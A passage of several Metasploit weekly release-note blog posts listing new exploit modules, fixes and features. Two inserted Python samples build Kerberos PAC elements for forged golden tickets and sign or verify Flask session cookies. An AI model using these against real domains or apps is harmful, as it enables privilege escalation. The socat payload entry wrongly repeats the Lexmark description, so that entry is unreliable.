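Added example, not code from Metasploit or forge_ticket.  Layouts follow MS-PAC;
the flag bit positions follow the forge_ticket output above.  SAMPLE_PAC below is
constructed data built from the domain SID and RID used in that run.
"""
import struct

# MS-PAC PAC_INFO_BUFFER ulType values of the two elements Server 2022 requires
PAC_ATTRIBUTES_INFO = 0x11
PAC_REQUESTOR = 0x12
# Flag bits as rendered by forge_ticket above: bit 0 = given implicitly, bit 1 = requested
PAC_WAS_GIVEN_IMPLICITLY = 0x1
PAC_WAS_REQUESTED = 0x2


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' as a binary SID: revision, sub-authority count,
    48-bit big-endian identifier authority, then little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> str:
    """Inverse of sid_to_bytes, rejecting a length that disagrees with the count byte."""
    revision, count = struct.unpack_from("<BB", data, 0)
    if len(data) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def pac_requestor(domain_sid: str, rid: int) -> bytes:
    """PAC_REQUESTOR carries the user SID, i.e. the domain SID with the RID appended."""
    return sid_to_bytes("%s-%d" % (domain_sid, rid))


def pac_attributes(flags: int, flags_length: int = 2) -> bytes:
    """PAC_ATTRIBUTES_INFO: FlagsLength (a bit count) followed by one flag word."""
    return struct.pack("<II", flags_length, flags)


def build_pac(buffers):
    """PACTYPE: cBuffers, Version, a directory of (ulType, cbBufferSize, Offset)
    entries, then the buffers themselves, each padded to an 8-byte boundary."""
    offset = 8 + 16 * len(buffers)
    directory, body = b"", b""
    for ultype, data in buffers:
        directory += struct.pack("<IIQ", ultype, len(data), offset)
        padded = data + b"\x00" * (-len(data) % 8)
        body += padded
        offset += len(padded)
    return struct.pack("<II", len(buffers), 0) + directory + body


def parse_pac(blob: bytes) -> dict:
    """Return {ulType: buffer bytes}; directory entries pointing outside the blob are rejected."""
    cbuffers, version = struct.unpack_from("<II", blob, 0)
    if version != 0:
        raise ValueError("unsupported PACTYPE version %d" % version)
    buffers = {}
    for i in range(cbuffers):
        ultype, size, offset = struct.unpack_from("<IIQ", blob, 8 + 16 * i)
        if offset + size > len(blob):
            raise ValueError("buffer type 0x%x runs past the end of the PAC" % ultype)
        buffers[ultype] = blob[offset:offset + size]
    return buffers


def pac_is_well_formed(blob: bytes) -> bool:
    try:
        parse_pac(blob)
        return True
    except (ValueError, struct.error):
        return False


def check_2022_elements(blob: bytes, domain_sid: str, rid: int) -> list:
    """List what a Server 2022 consumer would object to: a missing buffer, a
    requestor SID that is not domain SID + RID, or a too-short attributes field."""
    findings = []
    buffers = parse_pac(blob)
    requestor = buffers.get(PAC_REQUESTOR)
    expected = "%s-%d" % (domain_sid, rid)
    if requestor is None:
        findings.append("PAC_REQUESTOR missing")
    elif bytes_to_sid(requestor) != expected:
        findings.append("PAC_REQUESTOR SID %s does not match %s" % (bytes_to_sid(requestor), expected))
    attrs = buffers.get(PAC_ATTRIBUTES_INFO)
    if attrs is None:
        findings.append("PAC_ATTRIBUTES_INFO missing")
    else:
        flags_length, flags = struct.unpack_from("<II", attrs, 0)
        if flags_length < 2:
            findings.append("PAC_ATTRIBUTES_INFO FlagsLength %d is too short" % flags_length)
    return findings


DOMAIN_SID = "S-1-5-21-1242350107-3695253863-3717863007"  # domain SID from the run above
SAMPLE_PAC = build_pac([(PAC_REQUESTOR, pac_requestor(DOMAIN_SID, 500)),
                        (PAC_ATTRIBUTES_INFO, pac_attributes(PAC_WAS_GIVEN_IMPLICITLY))])
```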

New module content (5)

Apache Airflow 1.10.10 – Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow’s example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow’s Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc https://github.com/Kazamayc and h00die-gr3y
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

Enhancements and features (5)

  • #18294 from zgoldman-r7 – Improves error messages when failing to interact with a network interface such as calling set LHOST=.
  • #18358 from zeroSteiner – This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
  • #18361 from cgranleese-r7 – Updates the search command with the additional search keywords stage:, stager: and adapter:.
  • #18374 from h00die – Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
  • #18377 from ErikWynter – This change adds a check to the auxiliary/scanner/smtp/smtp_relay scanner module to confirm whether the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

  • #18359 from smashery – Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
  • #18369 from adfoster-r7 – This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
  • #18370 from adfoster-r7 – This PR fixes an issue where msfrpc would hang when updating saved command history.
  • #18378 from adfoster-r7 – Removes remaining debug logging from the Prometheus Exporter.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/15/metasploit-weekly-wrap-up-27/

Flask Cookies

This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset, where session cookies can be re-signed, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module, auxiliary/gather/python_flask_cookie_signer, allows for brute-forcing common signing keys from a wordlist as well as decoding cookies and re-signing cookies if the key is known (or recovered).
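As an added example (not code from the python_flask_cookie_signer module), the following Python re-implements the itsdangerous URLSafeTimedSerializer scheme that Flask's default session interface uses (salt cookie-session, HMAC key derivation, SHA-1 signatures), so that a session cookie can be decoded without the key and verified, including a max-age check, when the key is known. The secret key and session contents are constructed sample data.

```python
"""Decode and verify Flask session cookies (itsdangerous URLSafeTimedSerializer format).

Added example, not code from Metasploit or the python_flask_cookie_signer module.
Cookie layout: [.]base64url(payload).base64url(timestamp).base64url(signature),
where a leading "." marks a zlib-compressed payload.  The signature is
HMAC-SHA1 over everything before the last ".", keyed with
HMAC-SHA1(secret_key, b"cookie-session").  Secret and session data below are constructed.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # salt used by Flask's SecureCookieSessionInterface


def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive_key(secret: str) -> bytes:
    # itsdangerous key_derivation="hmac": the signing key is HMAC(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def _signature(secret: str, value: bytes) -> str:
    return _b64e(hmac.new(_derive_key(secret), value, hashlib.sha1).digest())


def decode_payload(cookie: str) -> dict:
    """Read the session contents WITHOUT checking the signature: the payload is
    only base64/zlib encoded, so anyone holding the cookie can inspect it."""
    compressed = cookie.startswith(".")
    body = cookie[1:] if compressed else cookie
    raw = _b64d(body.split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def sign_session(session: dict, secret: str, timestamp=None) -> str:
    """Produce a cookie Flask would accept for `session` under `secret`
    (compact sorted JSON, optional zlib compression, timestamp, signature)."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(raw)
    prefix = ""
    if len(compressed) < len(raw) - 1:  # itsdangerous only compresses when it pays off
        raw, prefix = compressed, "."
    ts = int(time.time()) if timestamp is None else int(timestamp)
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = prefix + _b64e(raw) + "." + ts_b64
    return value + "." + _signature(secret, value.encode())


def verify_session(cookie: str, secret: str, max_age=None, now=None):
    """Return the session dict if the signature (and, if given, the age limit)
    checks out under `secret`, otherwise None.  Constant-time comparison."""
    value, _, sig = cookie.rpartition(".")
    if not value or not sig:
        return None
    if not hmac.compare_digest(_signature(secret, value.encode()), sig):
        return None
    if max_age is not None:
        ts = int.from_bytes(_b64d(value.rpartition(".")[2]), "big")
        now = int(time.time()) if now is None else int(now)
        if now - ts > max_age:
            return None
    return decode_payload(cookie)


SECRET = "constructed-example-secret"  # constructed; never a real deployment key
SAMPLE_COOKIE = sign_session({"user_id": 1, "_fresh": True}, SECRET, timestamp=1694736000)
```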

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates 2 modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly MobileIron Sentry). Ivanti Sentry is vulnerable to an authentication bypass which exposes API functionality, allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
CVE reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
CVE reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities to achieve unauthenticated remote code execution on LG Simple Editor versions <= v3.21. The module achieves code execution in the context of NT AUTHORITY\SYSTEM by uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY\SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

  • #17474 from prabhatjoshi321 – This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
  • #18262 from cgranleese-r7 – Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
  • #18270 from pbarry25 – Improves tab completion for the set and unset commands.
  • #18327 from h00die – Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
  • #18349 from adfoster-r7 – Adds Meterpreter compatibility matrix generation to Github’s acceptance test runs. Now, it’s possible to visually see which Meterpreters support particular functionality.
  • #18354 from zeroSteiner – This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
  • #18356 from adfoster-r7 – This PR updates the Docker Golang version.
  • #18357 from adfoster-r7 – Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

  • #17970 from YiDa858 – Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
  • #18362 from adfoster-r7 – Fixes an edge case which could cause a new msfrpc console instance to hang forever.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure

Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

  • #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
  • #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/09/01/metasploit-weekly-wrap-up-25/

Pumpkin Spice Modules

Here in the northern hemisphere, fall is on the way: leaves changing, the air growing crisp and cool, and some hackers changing the flavor of their caffeine. This release features a new exploit module targeting Apache NiFi as well as a new and improved library to interact with it.

New module content (1)

Apache NiFi H2 Connection String Remote Code Execution

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #18257 contributed by h00die
Path: exploits/linux/http/apache_nifi_h2_rce
AttackerKB reference: CVE-2023-34468

Description: This adds an exploit module for an Apache NiFi H2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.

Enhanced Modules

Modules which have either been enhanced, or renamed:

Elasticsearch Enumeration Utility

Authors: Silas Cutler and h00die
Type: Auxiliary
Pull request: #18310 contributed by h00die
Path: auxiliary/gather/elasticsearch_enum

Description: This updates the Elasticsearch auxiliary module. It has been renamed to elastic_enum, accepts credentials and will store data to disk that is pulled from the target.

  • #18247 from EgeBalci – This adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affect versions below 1.7.0.22. By chaining these vulnerabilities together, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.

Enhancements and features (1)

  • #18309 from zeroSteiner – This updates the ldap_query module to stream the results instead of collecting them all at once. This should improve the UX of using the module in large target environments with tens of thousands of accounts and the like.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/08/25/metasploit-weekly-wrap-up-24/

Power[shell]Point

This week’s new features and improvements start with two new exploit modules, leveraging CVE-2023-34960 in Chamilo versions 1.11.18 and below and CVE-2023-26469 in Jorani 1.0.0. Like CVE-2023-34960, I too feel attacked by PowerPoint sometimes.
We also have several improvements, including additions to fetch payloads, PostgreSQL authentication, and documentation.

New module content (2)

Chamilo unauthenticated command injection in PowerPoint upload

Authors: Randorisec and h00die-gr3y
Type: Exploit
Pull request: #18233 contributed by h00die-gr3y
Path: exploits/linux/http/chamilo_unauth_rce_cve_2023_34960
AttackerKB reference: CVE-2023-34960

Description: This adds an exploit module that leverages an unauthenticated remote command execution vulnerability in Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a functionality called Chamilo Rapid, which easily converts PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at the OS level using a malicious SOAP request to the vulnerable endpoint /main/webservices/additional_webservices.php.

Jorani unauthenticated Remote Code Execution

Author: RIOUX Guilhem (jrjgjk)
Type: Exploit
Pull request: #18123 contributed by Guilhem7
Path: exploits/multi/php/jorani_path_trav
AttackerKB reference: CVE-2023-26469

Description: This PR adds a module that chains together a log poisoning LFI redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.

Enhancements and features (4)

  • #18214 from bwatters-r7 – This makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not, meaning there is now one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
  • #18276 from adfoster-r7 – Updates all PostgreSQL modules to support a newer form of authentication (SASL-SCRAM-256) that pen testers are now seeing more frequently in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
  • #18307 from ismaildawoodjee – This fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
  • #18308 from ismaildawoodjee – Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.

Bugs fixed (5)

  • #18272 from sfewer-r7 – This fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
  • #18287 from zeroSteiner – This fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
  • #18297 from adfoster-r7 – This fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
  • #18298 from adfoster-r7 – Changes the behavior of setting LHOST to an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now the lowest-ordinal IPv4 address is preferred first, followed by any IPv6 addresses.
  • #18306 from zeroSteiner – Fixes a crash when parsing ThriftHeader binary data.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/08/18/metasploit-weekly-wrap-up-23/

Meterpreter Testing

This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of different platforms, including Windows, Linux, and OS X, each of which has multiple Meterpreter implementations available that are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members who are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database’s web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

  • #18288 from adfoster-r7 – Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

  • #18275 from adfoster-r7 – Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files – the overall generated payload size can change as a result.
  • #18278 from rorymckinley – Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
  • #18289 from zeroSteiner – Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).